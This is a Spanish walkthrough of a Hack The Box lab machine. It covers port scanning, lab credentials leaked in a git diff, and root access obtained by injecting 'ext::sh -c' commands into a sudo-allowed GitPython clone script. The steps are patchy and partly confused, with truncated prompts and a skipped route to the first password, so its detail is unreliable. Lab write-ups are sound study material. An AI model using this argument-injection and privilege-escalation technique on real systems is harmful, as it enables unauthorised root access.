lo primero hacemos un ping a la máquina para saber si nos responde
ping -c 1 10.10.11.20
PING 10.10.11.20 (10.10.11.20) 56(84) bytes of data.
64 bytes from 10.10.11.20: icmp_seq=1 ttl=63 time=158 ms
--- 10.10.11.20 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 157.795/157.795/157.795/0.000 ms
lanzamos el primer comando de nmap para descubimiento de puertos a la escucha
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.20 -oG allPorts
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.20 -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-28 20:20 CET
Initiating SYN Stealth Scan at 20:20
Scanning 10.10.11.20 [65535 ports]
Discovered open port 22/tcp on 10.10.11.20
Discovered open port 80/tcp on 10.10.11.20
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 11.31% done; ETC: 20:20 (0:00:16 remaining)
cat allPorts
# Nmap 7.93 scan initiated Mon Oct 28 20:20:18 2024 as: nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn -oG allPorts 10.10.11.20
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.11.20 () Status: Up
Host: 10.10.11.20 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (65533)
# Nmap done at Mon Oct 28 20:20:38 2024 -- 1 IP address (1 host up) scanned in 19.42 seconds
solo tenemos el puerto 80 y 22, lanzamos el segundo comando con nmap para encontrar las versiones.
nmap -sCV -p22,80 10.10.11.20 -oN targeted
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-28 20:21 CET
Nmap scan report for 10.10.11.20
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0dedb29ce253fbd4c8c1196e7580d864 (ECDSA)
|_ 256 0fb9a7510e00d57b5b7c5fbf2bed53a0 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.45 seconds
cat targeted
# Nmap 7.93 scan initiated Mon Oct 28 20:21:58 2024 as: nmap -sCV -p22,80 -oN targeted 10.10.11.20
Nmap scan report for 10.10.11.20
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0dedb29ce253fbd4c8c1196e7580d864 (ECDSA)
|_ 256 0fb9a7510e00d57b5b7c5fbf2bed53a0 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Bien lo primero que haremos sera con whatweb ver si hay alguna vulnerabilidad
whatweb 10.10.11.20
http://10.10.11.20 [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.20], RedirectLocation[http://editorial.htb], Title[301 Moved Permanently], nginx[1.18.0]
ERROR Opening: http://editorial.htb - no address for editorial.htb
En efecto vemos que no reporta no address, al intntar acceder desde el navegador no vemos nada. Intentamos enumerar algun script
nmap --script http-enum -p80 10.10.11.20 -oN webScan
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-28 20:24 CET
Nmap scan report for 10.10.11.20
Host is up (0.17s latency).
PORT STATE SERVICE
80/tcp open http
Nos dice que esta aierto el puerto 80, asi que nos ponemos en escucha montanos un servidor en python
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Buscamos si tenemos permisos suid
find / -perm -4000 -user root 2>/dev/null
/opt/vivaldi/vivaldi-sandbox
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/ntfs-3g
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/bin/vmware-user-suid-wrapper
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/xorg/Xorg.wrap
/usr/libexec/polkit-agent-helper-1
/usr/sbin/exim4
/usr/sbin/pppd
/usr/share/codium/chrome-sandbox
Vos muchas rutas, pero nada que pueda aprobechar para elevar privilegios.
Pruebo a conectarme por ssh, veo que puedo, pero no tngo las contraseñas.
ssh editorial@10.10.11.20
The authenticity of host '10.10.11.20 (10.10.11.20)' can't be established.
ECDSA key fingerprint is SHA256:vD0RRLKSdq+ahh96RLgD4c6th30+PC391OHKI6SWlhY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.20' (ECDSA) to the list of known hosts.
editorial@10.10.11.20's password:
Connection closed by 10.10.11.20 port 22
Vuelvo a la web, intento hacer fuzzing para ver rutas existntes. encuentro un directorio interesante, entro y he encontradoel password del usuario dev
sh dev@10.10.11.20
dev@10.10.11.20's password:
Permission denied, please try again.
dev@10.10.11.20's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Mon Oct 28 08:26:33 PM UTC 2024
System load: 0.0 Processes: 245
Usage of /: 61.9% of 6.35GB Users logged in: 2
Memory usage: 14% IPv4 address for eth0: 10.10.11.20
Swap usage: 0%
veo la flag de usuario
cat user.txt
Intento ir al directorio root, pero no tengo permisos para ir a ese directorio. Busco permisos suid con find
ev@editorial:/$ find / -perm -4000 -user root 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/libexec/polkit-agent-helper-1
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/umount
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/su
/tmp/0xdf
veo el directorio passwd, intento entrar pero no tengo permisos y veo el siguiente error
ev@editorial:/usr/bin$ cat passwd
�[����2[�D Qf9���d�7�Fvm�@k�b0j��N^�}��AGW �������x, ��*��9�eq��gF"_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTable__cxa_finalize__libc_start_mainstderrdcgettext__fprintf_chkfputsfputcexitstdoutgetspnamgmtimestrftime__printf_chk__stack_chk_failfreestrcmp__errno_locationsetlocalestrdup__syslog_chk
con el comando getcap busco mas capabilities
dev@editorial:/usr/bin$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
bueno, bien, no veo como aprobaechar eso ahora mismo. Sigo mirando con un ls y veo otro directorio
dev@editorial:~$ ls
apps user.txt
dev@editorial:~$ cd apps/
Mediante una busqueda por internet veo que desde el directorio apps tengo que usar git para entrar en los diferentes entornos
dev@editorial:~/apps$ git log --oneline
8ad0f31 (HEAD -> master) fix: bugfix in api port endpoint
dfef9f2 change: remove debug and update api port
b73481b change(api): downgrading prod to dev
1e84a03 feat: create api to editorial info
3251ec9 feat: create editorial app
Voy probando por que no se lo que habrá en cada uno de ellos
dev@editorial:~/apps$ git log -p 3251ec9
commit 3251ec9e8ffdd9b938e83e3b9fbf5fd1efa9bbb8
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date: Sun Apr 30 20:48:43 2023 -0500
feat: create editorial app
* This contains the base of this project.
* Also we add a feature to enable to external authors send us their
books and validate a future post in our editorial.
diff --git a/app_editorial/app.py b/app_editorial/app.py
new file mode 100644
Ahi no veo nada voy aprobar otro
ommit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date: Sun Apr 30 20:55:08 2023 -0500
change(api): downgrading prod to dev
* To use development environment.
diff --git a/app_api/app.py b/app_api/app.py
index 61b786f..3373b14 100644
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -64,7 +64,7 @@ def index():
@app.route(api_route + '/authors/message', methods=['GET'])
def api_mail_new_authors():
return jsonify({
- 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: prod\nPassword: 080217_Producti0n_2023!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
+ 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
}) # TODO: replace dev credentials when checks pass
# -------------------------------
ya puedo ver los nombres de usuarios del sistema y sus correspondientes contraseñas.
me hago usuario prod
dev@editorial:~/apps$ su prod
Password:
veo que permisos tengo
rod@editorial:~$ sudo -l
[sudo] password for prod:
Matching Defaults entries for prod on editorial:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User prod may run the following commands on editorial:
(root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *
Veo que ese mensaje me dice que tengo permisos de ejecucion de root n el directorio indicado.
le hago un cat y leo el contenido
prod@editorial:~$ cat /opt/internal_apps/clone_changes/clone_prod_change.py
#!/usr/bin/python3
import os
import sys
from git import Repo
os.chdir('/opt/internal_apps/clone_changes')
url_to_clone = sys.argv[1]
r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
ejecuto
prod@editorial:/tmp$ sudo python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext:: sh -c touch% /tmp/pwned'
Traceback (most recent call last):
File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
finalize_process(proc, stderr=stderr)
File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
proc.wait(**kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
cmdline: git clone -v -c protocol.ext.allow=always ext:: sh -c touch% /tmp/pwned new_changes
stderr: 'Cloning into 'new_changes'...
error: cannot run : No such file or directory
fatal: Can't run specified command
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
parece que da error, pero vuelvo a listar el directorio en el que estoy y veo un nuevo archivo pwned
prod@editorial:/tmp$ ls -l
total 156
-rwsrwsrwx 1 root root 125688 Oct 28 19:13 0xdf
-rw-r--r-- 1 root root 0 Oct 28 21:00 pwned
-rw-r--r-- 1 root root 33 Oct 28 16:32 root
-rw-rw-r-- 1 prod prod 42 Oct 28 15:06 shell.sh
drwx------ 3 root root 4096 Oct 28 10:01 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-ModemManager.service-UhnVKh
drwx------ 3 root root 4096 Oct 28 10:01 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-systemd-logind.service-3ntdas
drwx------ 3 root root 4096 Oct 28 10:01 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-systemd-resolved.service-ET5KMa
drwx------ 3 root root 4096 Oct 28 10:01 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-systemd-timesyncd.service-WEXcRM
drwx------ 3 root root 4096 Oct 28 16:28 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-upower.service-hICjtH
drwx------ 2 root root 4096 Oct 28 10:02 vmware-root_795-4257200573
Me hago un script en bash y me doy permisos de ejecucion de consola
prod@editorial:/tmp$ nano privesc
le doy permisis de ejecucion
editorial:/tmp$ chmod 775 privesc
vuelvo a ejecutar
prod@editorial:/tmp$ sudo python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c /tmp/privesc.sh'
Traceback (most recent call last):
File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
finalize_process(proc, stderr=stderr)
File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
proc.wait(**kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
cmdline: git clone -v -c protocol.ext.allow=always ext::sh -c /tmp/privesc.sh new_changes
stderr: 'Cloning into 'new_changes'...
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
listo el directorio actual
prod@editorial:/tmp$ sudo ./privesc.sh
Sorry, user prod is not allowed to execute './privesc.sh' as root on editorial.
prod@editorial:/tmp$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1396520 Mar 14 2024 /bin/bash
prod@editorial:/tmp$ bash -p
bash-5.1# whoami
root
bash-5.1# cd /root
bash-5.1# ls
root.txt
ya soy root.